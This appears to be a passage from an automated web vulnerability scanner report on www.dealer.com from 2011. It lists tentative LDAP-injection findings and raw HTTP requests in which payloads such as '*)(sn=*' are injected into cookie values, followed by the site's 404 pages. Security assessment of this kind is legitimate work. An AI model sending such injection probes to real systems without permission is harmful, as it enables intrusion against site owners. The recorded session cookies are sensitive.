Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002850; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A3%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3B%7D; __utma=*)(sn=*; __utmc=161351586; __utmb=161351586.41.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20356
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:28:58 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003737; expires=Mon, 16-Apr-2012 01:28:57 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>We were able to have our design and brand vision executed. It is very important that we look the way we want to look and that we represent our company and our brand in a specific way and Dealer.com accomplished that. &#8230;</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>With Dealer.com, we continuously improve and advance. We added video to our website this year and doubled the average time people spend on our site.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We have more visitors on our site than we do cars that go by on the street. If that's not powerful, I don't know what is. Dealer.com knows how to sell cars on the Internet. </p>
   <cite>Dave Cook, President of the Norris Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>One of Dealer.com's greatest advantages is the reporting. The speed of the reporting tool, the ease of use and the timely, relevant data allow me to make changes on the fly.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/u
...[SNIP]...

Request 2

GET /products/lead-management/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002850; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A3%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3B%7D; __utma=*)!(sn=*; __utmc=161351586; __utmb=161351586.41.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20027
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:28:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003738; expires=Mon, 16-Apr-2012 01:28:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>The backend administrative system is just so easy and fast to use.</p>
   <cite>Greg Nalewaja, General Manager, Metro Honda of Union County</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Dealer.com is always looking for ways to improve, so they're intense in that. They're never standing still and their service is impeccable.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>The number of visitors has doubled since we went on board nearly a year and a half ago.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>From technology, to innovation, to support, I've had an extremely positive experience with Dealer.com.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine </cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="
...[SNIP]...

1.7. http://www.dealer.com/products/lead-management/media/uploads/page/loading.gif [com.silverpop.iMAWebCookie cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/lead-management/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMAWebCookie cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the com.silverpop.iMAWebCookie cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /products/lead-management/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMAWebCookie=*)(sn=*; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002850; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A3%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.41.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20042
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:25:58 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003558; expires=Mon, 16-Apr-2012 01:25:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Our account manager is always pleasant, efficient and communicates really well with us.</p>
   <cite>Carrie Casebeer, Capitol Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>In the 2 years that we have been with Dealer.com, our rankings have drastically improved, and our lead volume has gone up at least 40%.</p>
   <cite>Alex Jefferson, Proctor Dealerships </cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Total Control Dominator has really helped us out, and the fact that it is integrated with a lot of other functions on the website is very helpful.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The number of visitors has doubled since we went on board nearly a year and a half ago.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>One of Dealer.com's greatest advantages is the reporting. The speed of the reporting tool, the ease of use and the timely, relevant data allow me to make changes on the fly.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Service_marketingtile_1.jpg" alt="Recapture lost customers & Increase Service Revenue with Service Marketing" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real hum
...[SNIP]...

Request 2

GET /products/lead-management/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMAWebCookie=*)!(sn=*; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002850; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Flvlc%2F%22%3Bi%3A3%3Bs%3A14%3A%22%2Fblog%2F2010%2F06%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.41.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20134
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:25:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003559; expires=Mon, 16-Apr-2012 01:25:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Ranked #8 in the nation in April and #12 YTD (up from 16th last year), you and your team have been leading our progress.</p>
   <cite>Ken Girard, McGrath Acura of Westmont</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We depend very heavily on the SEO team at Dealer.com to ensure that our goals are accomplished as it relates to where we show up in the search engines.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>This is an awesome company which just happens to have their headquarters located about 5 minutes away from our dealership. I know their employees personally, I have been inside their building, and I have seen the explosive growth they have achieved. &#8230;</p>
   <cite>John Kimel, Lewis Autos</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>I&#8217;ve had access to other people&#8217;s systems, so I can honestly say that Dealer.com is by far the easiest to for the end user.</p>
   <cite>Christopher Della Bella, D&#8217;Ella Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>One of the benefits of Dealer.com is when you manage a whole group, you can log into ControlCenter&#8482; and easily toggle between all stores. It&#8217;s seamless!</p>
   <cite>Kendall Burger, Hansel Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight
...[SNIP]...

1.8. http://www.dealer.com/products/online-advertising/powermail/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/lead-management/ cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/online-advertising/powermail/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./products/lead-management/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads d62447ad87cf5458)(sn=* and d62447ad87cf5458)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./products/lead-management/ cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /products/online-advertising/powermail/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/online-advertising/powermail/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.page_visit./products/lead-management/=d62447ad87cf5458)(sn=*; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002861; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.43.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20162
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:26:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003618; expires=Mon, 16-Apr-2012 01:26:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>The transition to Dealer.com from our previous provider was way beyond my expectations. If someone were to contact me for advice regarding which website provider would be the best, I would say Dealer.com, hands down. </p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Dealer.com has lived up to every one of their promises.</p>
   <cite>Mitchell Brenner, Precision Acura</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>All I can say is WOW! I have never seen so many leads come from a dealership website in my life. We have cut out one of our most expensive lead providers last month because we received 383 leads from our &#8230;</p>
   <cite>Internet Sales Director for a BMW dealership at a top Dealer Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>For dealers who want to compete using SEO, they don&#8217;t need to build outside microsites for content anymore. They can do it right inside the Dealer.com platform.</p>
   <cite>Brian Pasch, Pasch Consulting Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>It was very important to find someone with a suite of products that could not only help us today, but could help us in the long term.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/websites/videosmartsites/" title="Video S
...[SNIP]...

Request 2

GET /products/online-advertising/powermail/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/online-advertising/powermail/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.page_visit./products/lead-management/=d62447ad87cf5458)!(sn=*; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002861; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.43.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20238
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:27:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003619; expires=Mon, 16-Apr-2012 01:26:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>People do ask me quite a bit, &#8216;what website provider will best help me with my search engine marketing and optimization?&#8217; I tell them the first thing they need to do is talk to Dealer.com.</p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Dealer.com's backend tool is definitely the best in the industry. I like the simplicity of one login, and how all the webstats are one click away.</p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We have been with Dealer.com for over a year now and the entire experience has been positive.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>What I like best about SocialRelationship Manager&#8482; is it enables me as a dealer to both listen and to speak to my audience and customers on a platform that is so simple to use.</p>
   <cite>Dan Boismer, Suburban Collection</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSi
...[SNIP]...

1.9. http://www.dealer.com/products/online-advertising/search-engine-optimization/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./company/contact/ cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/online-advertising/search-engine-optimization/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./company/contact/ cookie appears to be vulnerable to LDAP injection attacks.

The payloads c57a1dde651b3a70)(sn=* and c57a1dde651b3a70)!(sn=* were each submitted in the com.silverpop.iMA.page_visit./company/contact/ cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /products/online-advertising/search-engine-optimization/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/online-advertising/search-engine-optimization/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
